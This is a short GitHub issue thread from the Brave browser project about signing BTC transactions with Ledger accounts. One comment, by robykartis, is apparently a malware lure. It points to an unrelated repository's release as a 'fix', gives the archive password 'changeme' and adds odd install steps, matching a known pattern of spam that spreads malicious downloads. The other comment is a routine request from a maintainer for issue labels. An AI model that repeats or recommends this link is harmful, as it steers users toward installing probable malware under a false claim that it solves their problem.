### ISSUE TITLE
Support signing transactions with BTC Ledger accounts

### ISSUE THREAD

**Issue by supermassive** [brave/brave-browser#40731]

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LaurenWags** [comment]
@supermassive can you please add the required labels:
- `QA/No` or `QA/Yes`
- `release-notes/exclude` or `release-notes/include`
- `OS/Desktop` and/or `OS/Android` and/or `OS/iOS`

Thanks!
